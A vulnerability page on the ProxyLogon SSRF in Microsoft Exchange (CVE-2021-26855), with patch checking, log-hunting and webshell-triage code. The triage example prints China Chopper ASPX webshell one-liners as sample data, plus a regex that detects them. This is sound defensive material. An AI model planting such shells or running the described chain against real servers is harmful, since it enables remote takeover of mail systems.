NAVANEM
CVE-2021-26855 ⚡ exploited in the wild

Microsoft Exchange Server, SSRF (ProxyLogon)

Microsoft Exchange Server Remote Code Execution Vulnerability.

Overview

CVE-2021-26855 is a critical pre-authentication Server-Side Request Forgery (SSRF) vulnerability in Microsoft Exchange Server, best known as the entry point of the "ProxyLogon" exploit chain. It lets an unauthenticated network attacker route arbitrary HTTP requests through the Exchange front end to the backend services, which trust the front end, and so act as any mailbox user, including Exchange administrators. Microsoft disclosed and patched it on March 2, 2021 and attributed the in-the-wild exploitation to HAFNIUM, a China-based state-sponsored group. Exploitation had begun by early January 2021, and in the days around disclosure tens of thousands of Internet-exposed Exchange servers were compromised, which made it the defining on-premises Exchange security incident.

Technical Details

The flaw is in the Exchange front end (the Client Access Service, implemented as IIS HttpProxy modules for OWA, ECP, Autodiscover and the other client protocols), which terminates client connections and proxies them to the backend services on the same or another mailbox server. A request for a static resource path under /owa/auth/ or /ecp/ that carries a crafted X-BEResource cookie makes the front end forward an attacker-chosen request to an arbitrary backend URL, and the backend accepts it because it trusts the front end rather than the original client. An unauthenticated attacker can therefore reach the backend Autodiscover and MAPI endpoints to learn a target user's LegacyDN and SID, and then reach the backend ECP as that user, including an Exchange administrator, without knowing any credentials.

Microsoft's March 2, 2021 advisory covered four Exchange vulnerabilities that HAFNIUM was using together. The ProxyLogon chain proper pairs CVE-2021-26855 with CVE-2021-27065: the SSRF yields an administrator session on the backend ECP, and the file write (abusing the OAB virtual directory's external URL setting, which ECP writes to a file at a path the attacker chooses when the directory is reset) drops an ASPX webshell under the IIS web root. The webshell runs as SYSTEM because Exchange's IIS application pools run as LocalSystem. The other two vulnerabilities were used alongside it:

  • CVE-2021-26857: insecure deserialization in the Unified Messaging service, giving SYSTEM code execution but requiring administrator rights or another vulnerability first
  • CVE-2021-26858: post-authentication arbitrary file write
  • CVE-2021-27065: post-authentication arbitrary file write, the one used in the ProxyLogon chain

Against an unpatched Exchange 2013, 2016 or 2019 server whose HTTPS port is reachable, the chain needs no credentials: the attacker needs only the server's address and the e-mail address of a user to impersonate. Exchange 2010 is not affected by the SSRF and received a fix for CVE-2021-26857 only.

Impact

The impact of CVE-2021-26855 was catastrophic for organizations running on-premises Exchange:

  • Mass exploitation: after the March 2, 2021 disclosure, scanning and automated webshell deployment reached a large share of the Internet-exposed servers that had not yet been patched within days; estimates at the time ran to tens of thousands of compromised servers in the United States alone and far more worldwide
  • Multiple threat actors: Beyond HAFNIUM, dozens of actors weaponized the chain including ransomware affiliates, cryptocurrency miners, and opportunistic webshell operators
  • Federal response: CISA issued Emergency Directive 21-02 mandating immediate patching across federal civilian agencies
  • MSP impact: managed service providers, whose customers ran large numbers of small on-premises deployments, spent weeks on incident response and rebuilding customer mail environments

On-premises Exchange has remained one of the top risks in a typical MSP estate ever since.

Mitigation

  1. Apply patches: install the March 2021 Security Updates (for Exchange 2013 CU23, 2016 CU19 or CU20, and 2019 CU8 or CU9) or any later cumulative update on every on-premises Exchange server. The SU only installs on those CU levels, so a server on an older CU must be brought to a supported CU first. Where patching has to wait, Microsoft's Exchange On-premises Mitigation Tool (EOMT) applies an IIS URL rewrite rule that blocks the SSRF request pattern and runs the Microsoft Safety Scanner; treat it as a stopgap, not a fix
  2. Assume compromise: patching closes the hole but does not remove webshells or accounts an attacker already placed. If any Exchange server was Internet-exposed and unpatched at any point from January 2021 (the earliest known exploitation) until it was patched, assume historical compromise: preserve logs and disk images for investigation, rebuild the server, rotate the credentials and certificates it held, and audit Active Directory for persistence mechanisms
  3. Migration: consider migrating to Exchange Online where business requirements permit; a hybrid deployment still needs its on-premises server patched, and a server kept only for recipient management should not be reachable from the Internet
  4. Network segmentation: restrict direct Internet access to Exchange servers where possible, for example by fronting OWA and ECP with a VPN or an authenticating reverse proxy; the chain needs only port 443, so a firewall that passes HTTPS straight to Exchange offers no protection
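A fleet check for step 1, written for this page as an added example in Python (not code from the page or from Microsoft). The patched builds are the March 2021 SU entries from Microsoft's published Exchange build number table; check the current table before relying on them. The server inventory in the `__main__` block is constructed. Feed the function the file version of ExSetup.exe (in the Exchange Management Shell, `(Get-Command ExSetup.exe).FileVersionInfo.FileVersion`, which prints a zero-padded form such as 15.02.0792.010) rather than `Get-ExchangeServer`'s AdminDisplayVersion, which reports only the cumulative update and does not change when a security update is installed.

```python
"""Decide whether an on-premises Exchange build carries the March 2021 Security Update.

Added example, not code from the page or from Microsoft. Build numbers are the
March 2021 SU rows of Microsoft's Exchange build number table; verify against the
current table before relying on them.
"""
import re

# (major, minor, CU build) -> first revision that carries the March 2021 SU.
MARCH_2021_SU = {
    (15, 0, 1497): 12,  # Exchange 2013 CU23
    (15, 1, 2176): 9,   # Exchange 2016 CU19
    (15, 1, 2242): 4,   # Exchange 2016 CU20
    (15, 2, 721): 13,   # Exchange 2019 CU8
    (15, 2, 792): 10,   # Exchange 2019 CU9
}
PRODUCT = {(15, 0): "Exchange 2013", (15, 1): "Exchange 2016", (15, 2): "Exchange 2019"}


def parse_build(text):
    """Accept '15.2.792.10', '15.02.0792.010' or 'Version 15.2 (Build 792.10)'."""
    nums = re.findall(r"\d+", text)
    if len(nums) != 4:
        raise ValueError(f"not an Exchange build string: {text!r}")
    return tuple(int(n) for n in nums)


def assess(text):
    """Return (status, reason); status is 'patched', 'unpatched' or 'not-applicable'."""
    major, minor, cu, rev = parse_build(text)
    line = (major, minor)
    if line not in PRODUCT:
        # Exchange 2010 (14.x) or unknown: the SSRF does not apply, check it separately
        return "not-applicable", f"{major}.{minor} is not Exchange 2013/2016/2019"
    name = PRODUCT[line]
    newest_cu = max(k[2] for k in MARCH_2021_SU if k[:2] == line)
    if cu > newest_cu:
        # CUs released after March 2021 ship with the fix built in
        return "patched", f"{name} CU build {cu} is newer than the March 2021 SU baseline"
    required = MARCH_2021_SU.get((major, minor, cu))
    if required is None:
        return "unpatched", f"{name} CU build {cu} cannot take the March 2021 SU; update the CU first"
    if rev >= required:
        return "patched", f"{name} build {cu}.{rev} is at or above the March 2021 SU ({cu}.{required})"
    return "unpatched", f"{name} build {cu}.{rev} predates the March 2021 SU ({cu}.{required})"


def is_patched(text):
    return assess(text)[0] == "patched"


def report(builds):
    """builds: {server name: build string}. Return the names still unpatched, sorted."""
    return sorted(name for name, build in builds.items() if assess(build)[0] == "unpatched")


if __name__ == "__main__":
    fleet = {  # constructed inventory, not real servers
        "EX01": "Version 15.2 (Build 792.10)",
        "EX02": "15.02.0721.002",
        "EX03": "15.1.2308.8",
        "EX04": "14.3.513.0",
    }
    for server, build in fleet.items():
        print(server, *assess(build))
    print("still unpatched:", report(fleet))
```

The "unpatched" verdict for an unsupported CU matters in practice: the March SU refused to install on older CUs, and servers that were upgraded in a hurry to a supported CU without then applying the SU stayed vulnerable.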

Detection

  1. Hunt for HAFNIUM webshells: look for unexpected .aspx files in the directories Microsoft listed in its HAFNIUM IOCs, above all C:\inetpub\wwwroot\aspnet_client\, C:\inetpub\wwwroot\aspnet_client\system_web\ and the FrontEnd\HttpProxy\owa\auth\ and FrontEnd\HttpProxy\ecp\auth\ folders under the Exchange installation directory. HAFNIUM's shells were mostly China Chopper one-liners, a single ASPX page that evaluates a request parameter as code; compare hashes against Microsoft's published IOC list, and treat any file that is not part of a clean Exchange install of the same build as suspect
  2. Log analysis: the HttpProxy logs under the Exchange Logging\HttpProxy\ folder record each proxied request; an entry with an empty AuthenticatedUser and an AnchorMailbox of the form ServerInfo~<host>/<path> is the published SSRF indicator. The IIS logs show the corresponding POST requests to static resources under /owa/auth/ and /ecp/ from unauthenticated clients, and the ECP server logs (Logging\ECP\Server\) show the virtual-directory changes that CVE-2021-27065 makes. Log retention is limited, so an absence of hits in logs that do not cover the exposure window proves nothing
  3. Microsoft tools: run Test-ProxyLogon.ps1 from Microsoft's CSS-Exchange repository, which automates the log and webshell checks above, and the Microsoft Safety Scanner (MSERT), which carries HAFNIUM webshell signatures; compare findings with the MSTIC IOC list of hashes, paths and IP addresses
  4. Active Directory audit: review for unauthorized accounts, new members of privileged groups, persistence mechanisms, or privilege escalation that may indicate past compromise; HAFNIUM was observed dumping LSASS memory and exporting mailboxes, so once a webshell is found treat credential theft and data exfiltration as likely
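The log hunt and webshell triage from items 1 and 2, as an added Python example written for this page (not code from the page, from Microsoft, or from the CSS-Exchange scripts). The HttpProxy log lines and the file contents are constructed for the example; the #Fields: header is trimmed to the columns this hunt uses (real HttpProxy logs carry many more columns, and the parser keys on column names, so it accepts the full header unchanged). The webshell directories are the ones from Microsoft's HAFNIUM IOCs, and the content check matches the China Chopper one-liner shape.

```python
"""Offline hunt for ProxyLogon traces: HttpProxy log entries and webshell candidates.

Added example, not code from the page, Microsoft or the CSS-Exchange scripts.
SAMPLE_LOG and SAMPLE_FILES are constructed; the #Fields: line is trimmed to the
columns used here, and the parser keys on column names so full logs work too.
"""
import csv
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Directories named in Microsoft's HAFNIUM webshell IOCs (lower-case for matching).
WEBSHELL_DIRS = {
    r"c:\inetpub\wwwroot\aspnet_client",
    r"c:\inetpub\wwwroot\aspnet_client\system_web",
    r"c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth",
    r"c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth",
}
# China Chopper ASPX one-liner: eval of a request item in "unsafe" mode.
CHOPPER_RE = re.compile(r'eval\s*\(\s*Request\.Item\[[^\]]+\]\s*,\s*"unsafe"\s*\)', re.I)
# Published SSRF indicator: AnchorMailbox of the form ServerInfo~<host>/<path>.
SSRF_ANCHOR_RE = re.compile(r"^ServerInfo~[^/]+/.+")


@dataclass
class SsrfHit:
    when: str
    client_ip: str
    url_stem: str
    anchor_mailbox: str


def parse_httpproxy_log(text):
    """Yield one dict per data row, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].strip().split(",")
        elif not line or line.startswith("#"):
            continue  # other header lines (#Software, #Date, ...) and blanks
        elif fields is None:
            raise ValueError("data row before the #Fields: header")
        else:
            yield dict(zip(fields, next(csv.reader([line]))))


def find_ssrf_hits(log_text):
    """Rows with no authenticated user whose anchor names a backend host and path."""
    hits = []
    for row in parse_httpproxy_log(log_text):
        anchor = row.get("AnchorMailbox", "")
        if row.get("AuthenticatedUser", "") == "" and SSRF_ANCHOR_RE.match(anchor):
            hits.append(SsrfHit(row["DateTime"], row.get("ClientIpAddress", ""),
                                row.get("UrlStem", ""), anchor))
    return hits


def triage_files(files):
    """files: {windows path: content}. Return {path: reasons} for anything worth a look."""
    findings = {}
    for path, content in files.items():
        p = PureWindowsPath(path)
        reasons = []
        if p.suffix.lower() == ".aspx" and str(p.parent).lower() in WEBSHELL_DIRS:
            reasons.append("aspx in HAFNIUM webshell directory")
        if CHOPPER_RE.search(content):
            reasons.append("China Chopper eval pattern")
        if reasons:
            findings[path] = reasons
    return findings


SAMPLE_LOG = """#Software: Microsoft Exchange Server
#Version: 15.02.0721.013
#Log-type: HttpProxy Logs
#Date: 2021-03-02T00:00:00.000Z
#Fields: DateTime,RequestId,UrlHost,UrlStem,AuthenticationType,IsAuthenticated,AuthenticatedUser,AnchorMailbox,ClientIpAddress,Method,HttpStatus
2021-03-02T03:11:02.412Z,7a1c,mail.corp.example,/owa/auth/logon.aspx,,False,,,203.0.113.7,GET,200
2021-03-02T03:11:09.930Z,7a1d,mail.corp.example,/owa/auth/x.js,,False,,ServerInfo~mail.corp.example/autodiscover/autodiscover.xml?a=~1942062522,203.0.113.7,POST,200
2021-03-02T03:11:11.104Z,7a1e,mail.corp.example,/ecp/y.js,,False,,ServerInfo~mail.corp.example:444/ecp/proxyLogon.ecp?#,203.0.113.7,POST,200
2021-03-02T03:12:40.001Z,7a1f,mail.corp.example,/owa/,Negotiate,True,CORP\\jsmith,Sid~S-1-5-21-1-2-3-1105,198.51.100.20,GET,200
"""

SAMPLE_FILES = {  # constructed contents; the first has the classic one-liner shape
    r"C:\inetpub\wwwroot\aspnet_client\system_web\help.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>',
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx":
        '<%@ Page Language="C#" AutoEventWireup="true" %><!-- legitimate OWA page -->',
    r"C:\temp\notes.aspx":
        '<%eval(Request.Item["x"],"unsafe");%>',
}

if __name__ == "__main__":
    for hit in find_ssrf_hits(SAMPLE_LOG):
        print("SSRF:", hit)
    for path, reasons in triage_files(SAMPLE_FILES).items():
        print("FILE:", path, "->", "; ".join(reasons))
```

A hit from the directory check alone (logon.aspx in the sample) is a prompt to compare the file with a clean install of the same build, not a verdict; a hit from the content check is a shell wherever it sits. Run the log function over every file under Logging\HttpProxy\, not only the OWA subfolder, since the SSRF was exercised through several front-end paths.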